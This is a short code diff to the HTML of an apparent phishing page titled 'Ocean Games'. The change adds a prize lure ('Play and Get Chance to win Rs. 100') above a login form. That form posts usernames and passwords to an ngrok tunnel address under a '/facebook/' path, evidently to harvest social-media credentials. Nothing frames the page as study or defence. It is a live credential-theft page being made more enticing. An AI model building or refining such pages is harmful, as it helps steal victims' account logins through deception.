--- a/index.html
+++ b/index.html
@@ -8,6 +8,7 @@
     <div class="login-box">
     
         <h1>Ocean Games</h1>
+        <p>Play and Get Chance to win Rs. 100</p>
             <form action="http://cf04-27-34-13-168.ngrok.io/facebook/" metohd="post">
             <p>Username</p>
             <input type="text" name="username" placeholder="Enter Username">
